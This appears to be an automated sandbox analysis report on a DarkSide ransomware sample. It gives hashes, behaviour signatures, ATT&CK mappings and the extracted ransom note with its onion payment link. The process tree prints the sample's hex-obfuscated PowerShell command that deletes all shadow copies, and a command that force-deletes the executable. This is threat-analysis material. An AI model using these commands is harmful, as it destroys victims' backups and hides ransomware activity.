Overview

overview

10

Static

static

sage2.donotopen.exe

windows7_x64

10

sage2.donotopen.exe

windows10_x64

10

Analysis

  • max time kernel
    60s
  • max time network
    69s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    17-05-2021 14:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sage2.donotopen.exe

  • Size

    59KB

  • MD5

    7be33b01e9cb99c6e23ae3b02f384a2c

  • SHA1

    1f8a236ceafc44eea0c117b9d276d556e3fe53e2

  • SHA256

    b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8

  • SHA512

    c053fe23f5b25127bfe17d7eabad31aa7c3d696d78373e90d8ced9182598c4315fd0cb02aec12efee120996874894a0ef56671d3db4adedfcccb0b80c4b1c154

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.21b2020d.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39 When you open our website, put the following data in the input form: Key: O8cftGJ1pfLv5lKrmHB1GEA5n66Njf1IoiFZtDyJK7pBiGogpnuyofA8s6BYSOlZa77fma1teaR5FThKb6yVbUwdnRpfC8HAH5y3uyOku71bGSVGSHkW7qL1nVJPNZEeEEpektJpXiq5CDK6sen3WLkcHdSj5fwpGixQ7ytCt4J36QhSfGOCggTXweb3Ccvm2TqZCQQo7io6essoQGcHGFiqiceOVKVBuDq8xYEEODU3bf523VsgLA09gJeK3OkB1A9aWrX8VwwAVhNojxiotck0g0zw6kO6Yyn6zdZtwbCFv6Ny5E73WonoBoWoE8NhX2C6zXRvTogoUEDxfzTquiTRE4ciawueUJWWOqoprwxGqEM7b0ClmYGOMIDQs5xZwnkWLZH97aqBxHmKjGGVcSPts4YtipD4RlaLL5w4F57zcOi0nH8mHoLNA6guOKJSrWC8sGFbm1HUjDmUPxzxhWTg9GBL9cIP6LGorwqmazVcTJkV8JRJ78tFFqr8Ofa4X3ISHdfA3dkgEFWHgeGy2NxVGHSNXnL4fCIW1bKzwhORTrPH00spmCS !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe
    "C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3108
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL
      2⤵
        PID:4648
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2716

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ea6243fdb2bfcca2211884b0a21a0afc

      SHA1

      2eee5232ca6acc33c3e7de03900e890f4adf0f2f

      SHA256

      5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

      SHA512

      189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      67fc7b646bf0ff4129cf65bd31753fd9

      SHA1

      7428127d16a308ccd3d4ec950b540f31616322a9

      SHA256

      c87bb7e6b1480fff5001ec8fe03aa2b8868efa618c5576445a0676aaa31764b3

      SHA512

      9f58daffe014a9797c7e1d035f9577eab060d7a22ebc6cc4f40b9e348793d3b4adf27506df7ef5add9c86c6ee7c70d1cc1cb8cc3e9f33d447d72feeb7a32f264

      Download Submit
    • memory/3108-114-0x0000000000000000-mapping.dmp
      Download
    • memory/3108-120-0x000001589A210000-0x000001589A211000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3108-125-0x000001589A3C0000-0x000001589A3C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3108-127-0x00000158FEC83000-0x00000158FEC85000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3108-128-0x00000158FEC86000-0x00000158FEC88000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3108-126-0x00000158FEC80000-0x00000158FEC82000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4648-144-0x0000000000000000-mapping.dmp
      Download